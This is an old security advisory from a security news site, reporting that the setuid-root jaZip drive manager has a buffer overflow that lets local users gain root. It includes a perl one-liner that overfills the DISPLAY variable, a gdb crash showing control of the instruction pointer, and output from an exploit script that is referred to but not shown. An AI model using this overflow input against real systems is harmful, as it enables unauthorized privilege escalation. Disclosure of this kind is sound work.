[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Vulnerability in jaZip

Title: Vulnerability in jaZip
Released by: teleh0r
Date: 15th January 2001
Printable version: Click here
Dear, Bugtraq.

jaZip is a program for managing an Iomega Zip or Jaz drive.

It is often installed setuid root - and because of a buffer

overflow it is possible for regular users to become root.

Please excuse me if this was know. Please note that I can not

guarantee that this information is correct.

Tested rpm:



  [root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`

  [root@localhost /root]# gdb /usr/X11R6/bin/jazip

  GNU gdb 19991004

  Copyright 1998 Free Software Foundation, Inc.

  (gdb) r

  Starting program: /usr/X11R6/bin/jazip

  Program received signal SIGSEGV, Segmentation fault.

  0x41414141 in ?? ()


  [teleh0r@localhost teleh0r]$ rpm -q jaZip


  [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl

  Address: 0xbffff7ac


Exploit attached.

Sincerely yours,



To avoid criticism, do nothing, say nothing, be nothing.

-- Elbert Hubbard

(C) 1999-2000 All rights reserved.